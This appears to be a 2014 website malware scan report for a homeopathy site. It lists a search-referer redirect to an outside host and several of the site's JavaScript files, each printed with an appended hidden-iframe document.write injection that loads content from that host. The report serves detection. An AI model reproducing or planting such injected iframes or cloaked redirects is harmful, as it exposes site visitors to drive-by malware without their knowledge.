Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://catherinehollandhomeopathy.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: catherinehollandhomeopathy.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:29:23 GMT Location: http://Material.intelextraction.org/xcntrzkim.cgi?7 Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://catherinehollandhomeopathy.com/ | 200 OK Content-Length: 11528 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/media/system/js/caption.js | 200 OK Content-Length: 2130 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://catherinehollandhomeopathy.com/plugins/content/sigplus/js/safemode.initialize.min.js | 200 OK Content-Length: 907 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function __jQuery_version_compare__(){return function(e,f){for(var g=e.split("."),b=f.split("."),a=0;a<b.length;a++){var c=parseInt(g[a]),d=parseInt(b[a]);if(c!=d)return c>d}return true}(jQuery().jquery,"1.4.2")}if(typeof __jQuery__=="undefined"){if(typeof jQuery!="undefined"&&!__jQuery_version_compare__())var __jQueryOther__=jQuery;if(typeof jQuery=="undefined"||!__jQuery_version_compare__())google.load("jquery","1.4.2");else var __jQuery__=jQuery}; ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/plugins/content/sigplus/js/safemode.finalize.min.js | 200 OK Content-Length: 586 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof __jQuery__=="undefined"){var __jQuery__=jQuery.noConflict();if(typeof __jQueryOther__!="undefined")jQuery=__jQueryOther__}; ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/plugins/content/sigplus/engines/boxplus/slider/js/boxplus.transition.min.js | 200 OK Content-Length: 3953 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof __jQuery__=="undefined")var __jQuery__=jQuery; (function(b){function F(a,p){var g=parseInt(a.css(p));return isNaN(g)?a[p]():g}var x="boxplus-disabled",z=Math.max,G=Math.floor,A=Math.ceil;b.fn.maxWidth=function(){var a=0;this.each(function(p,g){a=z(a,b(g).safeWidth())});return a};b.fn.maxHeight=function(){var a=0;this.each(function(p,g){a=z(a,b(g).safeHeight())});return a};b.fn.safeWidth=function(){return F(this,"width")};b.fn.safeHeight=function(){return F(this,"height")};b.fn.boxp ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/plugins/content/sigplus/engines/boxplus/lang/boxplus.lang.min.js | 200 OK Content-Length: 2882 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof __jQuery__=="undefined")var __jQuery__=jQuery; (function(a){var e="",f={en:{language:"English",first:"First",prev:"Previous",next:"Next",last:"Last",close:"Close",enlarge:"Enlarge",shrink:"Shrink",download:"Download",metadata:"Image metadata"},de:{language:"Deutsch",first:"Erstes",prev:"Zurück",next:"Weiter",last:"Letztes",close:"SchlieÃen",enlarge:"VergröÃern",shrink:"Verkleinern",download:"Download",metadata:"Bild Metadaten"},es:{language:"Español",first:"Primera",prev:"Ante a(function(){var b=/lang=([a-z]{2,})(?:-([A-Z]{2,}))?/;a('script[src*="boxplus"][src*=lang]').each(function(){var c=b.exec(a(this).attr("src"));c&&a.boxplusLanguage(c[1],c[2])})})})(__jQuery__); ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/templates/layout110/jquery.js | 200 OK Content-Length: 91837 Content-Type: application/javascript | clean |
http://catherinehollandhomeopathy.com/templates/layout110/script.js | 200 OK Content-Length: 11966 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var m = document.uniqueID && document.compatMode && !window.XMLHttpRequest && document.execCommand; try { if (!!m) { m('BackgroundImageCache', false, true); } } catch (oh) { }; var data = [ {str:navigator.userAgent,sub:'Chrome',ver:'Chrome',name:'chrome'}, {str:navigator.vendor,sub:'Apple',ver:'Version',name:'safari'}, {prop:window.opera,ver:'Opera',name:'op }); } jQuery(function() { artButtonSetup("art-button"); }); jQuery(function() { artButtonSetup("button"); artButtonSetup("readon"); artButtonSetup("readmore"); });document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=1&Itemid=2 | 200 OK Content-Length: 10049 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=10&Itemid=12 | 200 OK Content-Length: 10260 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=2&Itemid=3 | 200 OK Content-Length: 13520 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=3&Itemid=4 | 200 OK Content-Length: 10194 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=9&Itemid=11 | 200 OK Content-Length: 10057 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=11&Itemid=13 | 200 OK Content-Length: 4734 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=catherinehollandhomeopathy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://catherinehollandhomeopathy.com/
Result: catherinehollandhomeopathy.com is not infected or malware details are not published yet.
Result: catherinehollandhomeopathy.com is not infected or malware details are not published yet.